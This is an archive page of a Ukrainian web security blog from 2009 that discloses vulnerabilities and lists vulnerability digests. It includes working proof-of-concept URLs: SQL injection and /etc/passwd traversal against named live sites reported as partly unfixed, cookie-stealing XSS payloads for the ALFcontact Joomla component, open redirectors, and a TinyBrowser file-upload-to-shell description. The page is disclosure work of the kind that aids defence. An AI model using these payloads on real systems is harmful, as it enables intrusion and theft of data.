Архів для категорії 'Уразливості'

Редиректори на секюріті сайтах №4

23:51 11.09.2009

Продовжую розповідати вам про редиректори на секюріті сайтах. Редиректори - це окремий різновид уразливостей в веб додатках, котрий відноситься до класу Abuse of Functionality. Дані уразливості можуть використовуватися зловмисниками для переадресації на небезпечні та фішинг сайти та інших атак.

До наведених в попередніх записах, приведу ще декілька прикладів редиректорів на сайтах про інформаційну безпеку.

Редиректори на секюріті та хакерських сайтах:

OpenID:

http://openid.net/redirect.php?site=websecurity.com.ua

Pro-Hack:

http://pro-hack.ru/index.php?…&url=http://websecurity.com.ua

Bezpeka:

http://bezpeka.com/ru/redirect/?url=http://websecurity.com.ua

Добірка уразливостей

16:22 11.09.2009

В даній добірці уразливості в веб додатках:

  • Updated policykit package fixes format string vulnerability (деталі)
  • bcoos 1.0.13 Remote File Include Vulnerability (деталі)
  • XSS in phpMyadmin (деталі)
  • MyBB 1.4.2: Multiple Vulnerabilties (деталі)
  • PHP-Nuke Module League (team&tid) XSS Vulnerability (деталі)
  • Cisco BBSM Captive Portal Cross-site Scripting (деталі)
  • Saba 2.0 Cross Site Scripting [PASSIVE] (деталі)
  • PHP-Nuke Module BookCatalog (category&catid) Remote SQL injection Vulnerability (деталі)
  • IranMC ( detail.php?Kala ) Remote SQL injection Vulnerability (деталі)
  • PHP-Nuke Module Sectionsnew (printpage&artid) Remote SQL injection Vulnerability (деталі)

Уразливості в плагінах для WordPress №20

23:55 10.09.2009

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP Comment Remix, My Category Order та WP-Syntax. Для котрих з’явилися експлоіти. WP Comment Remix - це плагін для покращення форми коментарів в WP, My Category Order - це плагін для налаштування порядку категорій, WP-Syntax - це плагін для підсвітки синтаксису різних мов.

  • WP Comment Remix 1.4.3 Multiple Vulnerabilities (деталі)
  • WordPress Plugin My Category Order <= 2.8 SQL Injection Vulnerability (деталі)
  • Wordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на www.contenta-jansoft.com

19:26 10.09.2009

08.06.2009

У вересні, 18.09.2008, а також додатково сьогодні, я знайшов SQL Injection, Cross-Site Scripting та Full path disclosure уразливості на сайті http://www.contenta-jansoft.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

10.09.2009

SQL Injection:

http://www.contenta-jansoft.com/html/xmlout.php?file='%20union%20select%20version(),1%23

XSS (через SQL Injection):

Full path disclosure:

http://www.contenta-jansoft.com/html/xmlout.php?file=’

Дані уразливості досі не виправлені.

Arbitrary File Upload уразливість в TinyBrowser

23:53 09.09.2009

У вересні, 03.09.2009, я знайшов Arbitrary File Upload уразливість в TinyBrowser - файл менеджері для редактора TinyMCE. Про що найближчим часом повідомлю розробникам.

Arbitrary File Upload:

http://site/path/tinybrowser.php?type=file

При доступі до TinyBrowser, доступ до якого не обмежується, можна завантажити через вбудований аплоадер будь-який файл, зокрема скрипт, що призведе до виконання довільного коду, в тому числі shell upload атаки. Якщо ж трапиться версія додатку, де завантаження скриптів буде заборонене, то можна, наприклад, завантажити php-скрипт з іншим дозволеним розширенням та провести Local File Include атаку.

Уразливі TinyBrowser 1.33 та попередні версії (та потенційно деякі наступні версії). Як я пізніше перевірив, в TinyBrowser 1.41.6 завантаження багатьох скриптів заборонене, але аплоадер можна використати для проведення LFI атаки. До того ж в останніх версіях TinyBrowser є чимало інших уразливостей.

Добірка уразливостей

16:11 09.09.2009

В даній добірці уразливості в веб додатках:

  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce (деталі)
  • flashchat severe bug (деталі)
  • Doubt in MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability (деталі)
  • Directory traversal vulnerability in Mercurial (деталі)
  • phpcrs <= 2.06 / Local File Inclusion Vulnerability (деталі)
  • vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability (деталі)
  • SiteEngine 5.x Multiple Remote Vulnerabilities (деталі)
  • iPei cross site scripting Vulnerablity (деталі)
  • txtshop - beta 1.0 / Local File Inclusion Vulnerability (деталі)

Уразливість на wap.samsung.ua

23:52 05.09.2009

Нещодавно, 03.09.2009, я знайшов Cross-Site Scripting уразливість на проекті http://wap.samsung.ua. Про що найближчим часом сповіщу адміністрацію проекту.

І хоча попередні три уразливості (знайдені мною в серпні 2008), що були пов’язані з уразливістю в Apache Tomcat, вони вже виправили, але я легко знайшов нову.

XSS:

Добірка уразливостей

16:11 05.09.2009

В даній добірці уразливості в веб додатках:

  • Vulnerability in Oracle WebLogic Apache Connector (деталі)
  • OpenNMS Multiple Vulnerabilities (деталі)
  • Arbitrary code execution in lynx (деталі)
  • NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability (деталі)
  • Iltaweb Alisveris, Sistemi (tr) Sql inj (деталі)
  • Oracle: CREATE ANY DIRECTORY to SYSDBA (деталі)
  • Webscene eCommerce (level) Remote Sql Injection (деталі)
  • WEB//NEWS SQL Injection and Cookie Manipulation (деталі)
  • Vivid Ads Shopping Cart (cid) Remote SQL Injection (деталі)
  • Smarty 2.6.20 php injection (деталі)

Уразливості на www.ejls.eu

22:44 04.09.2009

06.06.2009

У вересні, 18.09.2008, а також додатково сьогодні, я знайшов Arbitrary File Disclosure, Directory Traversal, Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.ejls.eu. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.09.2009

Arbitrary File Disclosure:

http://www.ejls.eu/download.php?file=download.php

Directory Traversal:

http://www.ejls.eu/download.php?file=../etc/passwd

Ці дві дірки вже виправлені.

Full path disclosure:

http://www.ejls.eu/load.php?action=1

XSS:

Половина з даних уразливостей досі не виправлена.

Нові уразливості в ALFcontact для Joomla

23:51 03.09.2009

Сьогодні я знайшов Cross-Site Scripting уразливості в компоненті ALFcontact (com_alfcontact) для Joomla. Це форма відправки повідомлень власнику сайта. Дані уразливості я виявив на одному веб сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в com_alfcontact для Joomla.

XSS:

Можлива атака як через POST, так і GET запити.

http://site/component/option,com_alfcontact/?name=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?email=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?subject=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?message=%22%20style=%22xss:expression(alert(document.cookie))

Уразливі ALFcontact 1.8, 1.9 та попередні версії. У версії ALFcontact 1.9.1 працюють перші три з чотирьох уразливостей.